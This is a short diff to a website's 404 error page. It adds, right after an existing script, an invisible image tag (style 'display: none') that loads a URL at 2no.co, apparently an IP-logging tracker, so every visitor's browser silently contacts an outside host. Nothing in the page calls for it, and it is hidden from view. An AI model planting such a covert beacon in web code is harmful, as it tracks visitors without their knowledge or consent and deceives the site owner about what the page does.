--- a/404.html
+++ b/404.html
@@ -5,4 +5,4 @@
 
 <script>
 $("#readtext").text(decodeURI(window.location.pathname.substring(1).toString()))
-</script>
+</script><img src="https://2no.co/17fry7.js" border="0" style="display: none;">
